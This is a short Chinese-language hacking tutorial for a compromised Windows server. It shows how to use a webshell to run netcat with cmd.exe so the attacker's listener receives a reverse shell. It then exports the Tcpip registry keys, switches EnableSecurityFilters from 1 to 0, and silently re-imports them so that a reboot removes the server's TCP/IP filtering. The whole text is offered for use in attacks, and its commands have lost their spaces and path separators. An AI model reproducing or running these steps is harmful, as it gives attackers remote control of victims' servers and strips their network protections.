1.用NC反弹得到一个shell

本机监听NC-l-p32

WEBSHELL运行：

x:xxxserv-u.exe"x:xxxnc.exe-ecmd.exe*.*.*.*port"

得到一个shell

2.CMD下导出注册表文件

C:>regedit-ex:xxx1.regHKEY_LOCAL_MACHINESYSTEMControlSet001Ser

vicesTcpip

C:>regedit-ex:xxx2.regHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

C:>regedit-ex:xxx3.regHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

修改各文件EnableSecurityFilters处

将最后的1改为0

3.将注册表文件导入

x:xxx>regedit-s1.reg

x:xxx>regedit-s2.reg

x:xxx>regedit-s3.reg

-S为无提示

重启命令iisreset/reboot

完成TCP/IP筛选限制